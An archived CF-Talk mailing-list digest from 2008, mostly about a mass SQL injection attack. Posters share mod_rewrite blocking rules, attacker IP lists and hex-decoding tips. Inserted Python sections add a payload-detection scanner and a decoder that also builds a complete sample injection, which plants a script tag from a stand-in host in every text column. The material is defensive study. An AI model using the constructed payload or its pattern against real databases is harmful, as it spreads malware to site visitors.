Re: Inside the hex code - just 2 sites

2008-08-09 Thread Les Mizzell
They are 3 3 2 2 . o r g Google the first one and you get plenty of interesting info. It's been used a number of times before... ~| Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to date Get

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Jochem van Dieten
Terry Ford wrote: Pretty ingenious really, infecting websites via injection attack in order to infect clients with browser vulnerabilities. In 2001 it was: http://www.cert.org/advisories/CA-2001-26.html Now it is just business as usual. Jochem

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Matt Williams
On Fri, Aug 8, 2008 at 11:12 PM, Raymond Camden [EMAIL PROTECTED] wrote: Hmm. I'm having no luck with this. I'm trying it on a blogcfc site, so it's being added after /, so I also added path_info

RewriteEngine on
RewriteCond %{QUERY_STRING} .*DECLARE.* [NC]
RewriteRule ^(.*)$

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Jon Clausen
Depending on your default directory settings in httpd.conf, you may need to add the following directory attributes as well to your site to allow mod_rewrite to operate:

#Allow mod rewrite on this directory
<Directory /srv/www/htdocs/mysite>
Options FollowSymLinks
AllowOverride All
Order

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Raymond Camden
No go. It's not life or death - I'm still using cfqueryparam, but I'd love to get this working at the lowest level.

On Fri, Aug 8, 2008 at 11:47 PM, denstar [EMAIL PROTECTED] wrote: non-wrapped (and it was grabbed off the web somewhere):

Options +FollowSymLinks
Options +Indexes

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Raymond Camden
Ok, I've noticed that when I go to host.com/?declare it is working but host.com/x/index.cfm?';[EMAIL PROTECTED](4000);[EMAIL

RE: iCalendar (.ics) file creation?

2008-08-09 Thread Rick Faircloth
Very nice, Den! Thanks! Rick -Original Message- From: denstar [mailto:[EMAIL PROTECTED] Sent: Saturday, August 09, 2008 1:23 AM To: CF-Talk Subject: Re: iCalendar (.ics) file creation? On Fri, Aug 8, 2008 at 10:18 PM, Rick Faircloth wrote: I've got some code for using ical4j,

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Wil Genovese
Ray, Our sysadmin ran into the same issue when we started on this yesterday. Here is part of the rule we're using now and it works for the case yours does not. Note the ^.

RewriteCond %{QUERY_STRING} ^.*DECLARE.*$

Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine

Re: Inside the hex code - just 2 sites

2008-08-09 Thread Wil Genovese
I forget who, but someone already posted here a list of websites inside the attack code. The websites are changing every few days. Wil Genovese One man with courage makes a majority. -Andrew Jackson A fine is a tax for doing wrong. A tax is a fine for doing well. On Aug 9, 2008, at 12:17 AM,

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Raymond Camden
Still no go for me. I appreciate the help from all. On Sat, Aug 9, 2008 at 8:58 AM, Wil Genovese [EMAIL PROTECTED] wrote: Ray, Our sysadmin ran into the same issue when we started on this yesterday Here is part of the rule we're using now and it works for the case yours does not. note the

Re: Why wasn't this error caught by my onError function

2008-08-09 Thread Raymond Camden
Which is a syntax error and can't be caught by error handling.

<cfif session.thisuser is 1229>

On Sat, Aug 9, 2008 at 12:31 AM, Michael Brennan-White [EMAIL PROTECTED] wrote: Actually the error was :

<cfif session.thisuser = 1229><cfdump var="#Resultz#" label="Resultz" expand="false" /></cfif>

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Mary Jo Sminkey
1) It protects only against known threats. In order to be excluded we have to be a step far enough ahead to make sure the pattern is included. 2) It will produce false positives. 3) It is not role or user based. 4) Tend to give a false sense of security. Just to add to this, in my own testing
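
The rewrite rules discussed above and the four limitations Mary Jo lists, worked through as an added example (my code, not code from anyone in the thread): a small Python scanner run over constructed Apache access-log lines. It compares a literal DECLARE check on the raw query string, which is what a RewriteCond on %{QUERY_STRING} sees because Apache does not URL-decode that variable, against a check that decodes first and then requires the whole DECLARE/CAST/EXEC shape. The log lines, timestamps, IP addresses (TEST-NET ranges) and the hex bytes are made up for this example; only the payload shape follows the thread.

```python
"""Scan access-log query strings for the DECLARE/CAST/EXEC injection shape.

Added example (not code from the thread). Compares a literal check on the
raw query string, which is what a RewriteCond on %{QUERY_STRING} sees,
against a check that URL-decodes first and matches the whole payload shape.
"""
import re
from collections import Counter
from urllib.parse import unquote_plus

# Shape of the payload discussed in the thread:
#   DECLARE @S VARCHAR(4000);SET @S=CAST(0x... AS VARCHAR(4000));EXEC(@S)
PAYLOAD = re.compile(
    r"DECLARE\s+@\w+\s+N?VARCHAR\s*\(\s*\d+\s*\)"  # DECLARE @S VARCHAR(4000)
    r".*?CAST\s*\(\s*0x[0-9a-f]+"                   # SET @S=CAST(0x...
    r".*?EXEC\s*\(",                                # EXEC(@S)
    re.IGNORECASE | re.DOTALL,
)

# Apache combined log format: client IP, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: TEST-NET addresses, made-up timestamps, and a
# hex blob that is just the ASCII for "SELECT", not a real payload.
SAMPLE_LOG = [
    # 1: the plain payload, spaces percent-encoded as in real requests
    '203.0.113.10 - - [09/Aug/2008:00:12:31 -0500] "GET /x/index.cfm?id=1%27;'
    'DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C454354%20AS%20VARCHAR(4000));'
    'EXEC(@S);-- HTTP/1.1" 200 5123',
    # 2: same payload, but the E in DECLARE is percent-encoded (%45)
    '203.0.113.10 - - [09/Aug/2008:00:12:44 -0500] "GET /x/index.cfm?id=1%27;'
    'D%45CLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x53454C454354%20AS%20VARCHAR(4000));'
    'EXEC(@S);-- HTTP/1.1" 200 5123',
    # 3: harmless search that happens to contain the word "declare"
    '198.51.100.7 - - [09/Aug/2008:00:13:02 -0500] "GET /search.cfm?q=declare+your+variables HTTP/1.1" 200 880',
    # 4: no query string at all
    '198.51.100.7 - - [09/Aug/2008:00:13:09 -0500] "GET /index.cfm HTTP/1.1" 200 2210',
]


def query_string(target: str) -> str:
    """Everything after the first '?' in the request target, still encoded."""
    return target.partition("?")[2]


def raw_literal_match(qs: str) -> bool:
    """Equivalent of  RewriteCond %{QUERY_STRING} DECLARE [NC]  on the raw string."""
    return "declare" in qs.lower()


def decoded_payload_match(qs: str) -> bool:
    """Decode once, as the application will, then require the full payload shape."""
    return PAYLOAD.search(unquote_plus(qs)) is not None


def scan(lines):
    """Return one verdict dict per parseable log line."""
    verdicts = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not in combined format; skip rather than guess
        qs = query_string(m["target"])
        verdicts.append({
            "ip": m["ip"],
            "raw_literal": raw_literal_match(qs),
            "decoded_payload": decoded_payload_match(qs),
        })
    return verdicts


def hits_per_ip(verdicts):
    """Count confirmed payload hits per source address (the kind of list posted later in the thread)."""
    return Counter(v["ip"] for v in verdicts if v["decoded_payload"])


if __name__ == "__main__":
    for v in scan(SAMPLE_LOG):
        print(v)
    print(hits_per_ip(scan(SAMPLE_LOG)))
```

Line 2 is missed by the literal check and line 3 is a false positive for it, which are Mary Jo's points 1 and 2 in miniature; the decoded check gets both right, but it still only knows this one payload shape. Neither replaces cfqueryparam, which is why Raymond keeps it in place while chasing the rewrite rule.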

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Terry Ford
Nimda did not use SQL injection as any sort of primary vector. SQL injection attacks have been around forever, but botnet/worm SQL injection attacks have really taken off pretty recently. It has gotten so bad that even Microsoft recently released a security advisory article that doesn't deal

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Jochem van Dieten
Terry Ford wrote: Nimda did not use SQL injection as any sort of primary vector. But it infected websites in order to infect browsers in order to infect websites etc. So the current wave of worms using the same mechanism is really 7 years too late to be ingenious. Jochem

Re: Inside the hex code - just 2 sites

2008-08-09 Thread Brad Wood
P.S. Don't ask me how the hex code was deciphered. Our network wizard did it and he just left on vacation. :)) I bet your network wizard spent too much time on it. :) I showed how to decode the hex a couple weeks ago. All you have to do is paste the injected SQL in query analyzer and

Re: Inside the hex code - just 2 sites

2008-08-09 Thread Wil Genovese
One of our DB guys had the code decoded in less than 5 minutes. I emailed it to him, then a few minutes later he said he was looking at what the code was doing, so I walked across the office to see. Dang if he hadn't decoded it already and was looking at the SQL. Wil Genovese One man with

RE: Inside the hex code - just 2 sites

2008-08-09 Thread Jeff Garza
I think it's already been discussed, but to decode this, all you need to do is paste the complete script into a query window (Query Analyzer) and MAKE SURE to change the EXEC to a PRINT at the end. Your SQL server will happily decode the string for you. -- Jeff -Original Message-
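
The same decode done without a SQL Server session at all, as an added example (mine, not from the thread): the hex inside CAST(0x... AS VARCHAR(4000)) is just the bytes of the statement, so a few lines of Python turn it back into text and pull out the script URLs it plants. That removes the step Jeff warns about, since there is no EXEC to forget to change to PRINT. The sample injection below is constructed from a made-up inner statement and a made-up hostname (reserved .invalid TLD); the cursor-over-syscolumns shape of that inner statement is my assumption about the payload, not something quoted from the thread. NVARCHAR variants carry two bytes per character (UTF-16LE), which the decoder also handles.

```python
"""Decode the hex inside a CAST(0x... AS VARCHAR) injection without a SQL Server.

Added example (not code from the thread). The hex is just the bytes of the
statement, so decoding is a text operation; nothing here executes SQL.
"""
import re

# CAST(0x<hex> AS VARCHAR(n)) or CAST(0x<hex> AS NVARCHAR(n))
HEX_CAST = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?)VARCHAR", re.IGNORECASE)
# src= of any <script> tag found in the decoded text
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'>\s]+)", re.IGNORECASE)


def decode_hex_payloads(injected_sql: str) -> list:
    """Decoded text of every CAST(0x... AS [N]VARCHAR(...)) in the input.

    VARCHAR is one byte per character; NVARCHAR is UTF-16LE, two bytes per
    character, so the same statement produces a hex string twice as long.
    """
    decoded = []
    for m in HEX_CAST.finditer(injected_sql):
        raw = bytes.fromhex(m.group(1))
        if m.group(2).upper() == "N":
            decoded.append(raw.decode("utf-16-le"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def injected_script_urls(decoded_sql: str) -> list:
    """The script URLs the decoded statement would plant in the database."""
    return SCRIPT_SRC.findall(decoded_sql)


# Constructed inner statement. Shape assumed here: a cursor over sysobjects /
# syscolumns that appends a <script> tag to every text column. The hostname
# is made up (reserved .invalid TLD).
INNER_SQL = (
    "DECLARE @T varchar(255),@C varchar(255) "
    "DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,"
    "syscolumns b where a.id=b.id and a.xtype='u' and "
    "(b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']="
    "rtrim(convert(varchar,['+@C+']))+''<script src=http://bad.example.invalid/b.js>"
    "</script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END "
    "CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def build_sample_injection(inner: str, wide: bool = False) -> str:
    """Wrap a statement the way the attack did; used only to make test input."""
    if wide:
        hexbody, kind = inner.encode("utf-16-le").hex().upper(), "NVARCHAR"
    else:
        hexbody, kind = inner.encode("latin-1").hex().upper(), "VARCHAR"
    return f"';DECLARE @S {kind}(4000);SET @S=CAST(0x{hexbody} AS {kind}(4000));EXEC(@S);--"


SAMPLE_INJECTION = build_sample_injection(INNER_SQL)
SAMPLE_INJECTION_N = build_sample_injection(INNER_SQL, wide=True)

if __name__ == "__main__":
    for text in decode_hex_payloads(SAMPLE_INJECTION):
        print(text)
        print("script sources:", injected_script_urls(text))
```

Feed it the query string from a log line (URL-decoded first) and it prints the statement and the hostnames, which is the list people have been posting in the "Inside the hex code" thread.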

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Al Musella, DPM
Here are my top 50: Note that the top 1 is in the same subnet as your top 1. I had 134,993 attempts that I caught.

IP (times)
203.160.1.52 (705)
203.162.3.160 (373)
203.160.1.76 (325)
61.164.132.230 (325)
59.15.212.125 (258)
210.112.177.244 (252)
70.189.143.59 (219)
221.253.217.138 (204)

RE: SQL injection attack on House of Fusion

2008-08-09 Thread Bobby Hartsfield
Now look at how many of those are from Asia Pacific Network Info Centre ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com http://cf4em.com -Original Message- From: Al Musella, DPM [mailto:[EMAIL PROTECTED] Sent: Saturday, August 09, 2008 12:35 PM To: CF-Talk Subject: Re:

How to assign default tab selector in cflayout

2008-08-09 Thread Dave Hatz
I am looking for a way to assign a different tab selector using cflayout. I have the following snippet: cflayoutarea title=Register cflayout type=tab name=registertabs cflayoutarea name=regtab1 title=Register Reports source=registers.cfm / cflayoutarea name=regtab2 title=Enter

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Brad Wood
Bobby, what have you been using to look up the origin of the IPs en masse? I found a site that lets me do a handful at a time, but I don't know how accurate the data is. It is saying the majority of my IPs originated from the US. ~Brad - Original Message - From: Bobby Hartsfield

RE: SQL injection attack - FBI

2008-08-09 Thread Al Musella, DPM
There are many that are on both lists.. most are Asia, but there are some locals, like 24.73.176.42 which is in virginia. I reported this to the FBI and offered to help identify the computers involved in the attack. IF they respond, maybe we could build a web app that collects all of our logs

DataServicesMessaging Event Gateway

2008-08-09 Thread Tony
Hi there. In hopes that someone might read this... my company has an LCDS 2.6 server currently sending data to a Flex client... and all is well... What I'm interested in doing is writing an event gateway application that would utilize the DataServicesMessaging event gateway, and have the cfc and

Re: Why wasn't this error caught by my onError function

2008-08-09 Thread Michael Brennan-White
Okay that makes sense. Thanks for the help.

Which is a syntax error and can't be caught by error handling.

<cfif session.thisuser is 1229> ...

Re: Anybody have experience with KickAssVPS.com?

2008-08-09 Thread Anon ymous
As a KAVPS user looking for other providers (note the looking for other providers part...), I would highly recommend you stay away from them. As far as I can tell there is exactly one person running this business, which would be fine if there weren't so many problems he needed to tend to. * I

RE: SQL injection attack - FBI

2008-08-09 Thread Al Musella, DPM
I heard back from the FBI.. a live agent, not an automated response like I was expecting:) They don't seem to care, but suggested that I report it to CERT at https://www.cert.org/reporting/incident_form.txt Perhaps if a few of us reported it to CERT, they will investigate. By the way - I hit

RE: SQL injection attack on House of Fusion

2008-08-09 Thread Bobby Hartsfield
I wrote something a long time ago to automate grabbing specified info from http://ws.arin.net/whois/ on an IP... I was bored You can pass the IP in the URL like so: http://ws.arin.net/whois/?queryinput=203.160.1.52 So... parse the content of a cfhttp call to

RE: SQL injection attack - FBI

2008-08-09 Thread Dave Watts
They don't seem to care, but suggested that I report it to CERT at https://www.cert.org/reporting/incident_form.txt Perhaps if a few of us reported it to CERT, they will investigate. CERT posted this back in June. It's been active for a while, but originally targeted ASP only. Dave Watts,

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Mike Kear
I guess I'm missing something, Bobby. Why does a big share of the problem belong to APNIC? Cheers Mike Kear Windsor, NSW, Australia Adobe Certified Advanced ColdFusion Developer AFP Webworks http://afpwebworks.com ColdFusion, PHP, ASP, ASP.NET hosting from AUD$15/month On Sun, Aug 10, 2008

RE: SQL injection attack on House of Fusion

2008-08-09 Thread Bobby Hartsfield
Because the majority of the IPs I've seen from this one belong to them... as they do more than not in these situations. Start keeping firewall logs in general and checking them. I guarantee you will find APNIC in them. ..:.:.:.:.:.:.:.:.:.:. Bobby Hartsfield http://acoderslife.com

Homebrew logging solutions

2008-08-09 Thread Pete Ruckelshaus
All of my sites are on shared servers, and I don't have access to the CF logs. With all of this SQL injection stuff going on, I feel like I should be gathering data to analyze...but the inability to use CFLOG means I would really need to roll my own. So, I have two choices -- use a database, or

Re: Homebrew logging solutions

2008-08-09 Thread Mike Chabot
Based on what you described, go with a database. A database would likely have higher performance and the data would be easier to analyze. -Mike Chabot On Sat, Aug 9, 2008 at 6:16 PM, Pete Ruckelshaus [EMAIL PROTECTED] wrote: All of my sites are on shared servers, and I don't have access to the

shuffling values in a 2 dimensional array

2008-08-09 Thread Mike Little
Hi guys, does anyone know of a script that will shuffle the order of a two-dimensional array? I found a script on cflib.org that shuffled a one-dimensional one and tried to extend it but to no avail!! Mike

RE: Homebrew logging solutions [bayes SPAMTRAP]

2008-08-09 Thread Andy
This is my favorite home brew site: http://homebrewheaven.com/ ;-) -Original Message- From: Mike Chabot [mailto:[EMAIL PROTECTED] Sent: Saturday, August 09, 2008 6:21 PM To: CF-Talk Subject: Re: Homebrew logging solutions [bayes SPAMTRAP][heur SPAMTRAP] Based on what you described,

RE: shuffling values in a 2 dimensional array

2008-08-09 Thread Dave Watts
does anyone know of a script that will shuffle the order of a two dimensional array. i found a script on cflib.org that shuffled a one dimensional one and tried to extend but to no avail!! I'm not exactly sure what result you want, but a two-dimensional array is just an array of arrays. You

Re: Homebrew logging solutions

2008-08-09 Thread Brad Wood
I agree. Log files can be quick and dirty but NOT easy to crunch unless you import them into a database. Memory usage can also suck if you are constantly reading and writing to a text file in some situations. If you are REALLY concerned about performance, use cfthread for the logging so it

Re: SQL injection attack on House of Fusion

2008-08-09 Thread Brad Wood
I'd tell you to watch what you suggest on a public forum, but heck-- we already know the FBI doesn't care. :) ~Brad Hmmm... if everyone did something like this... it would not only be funny... but probably piss off apnic and make them do something about their portion of this problem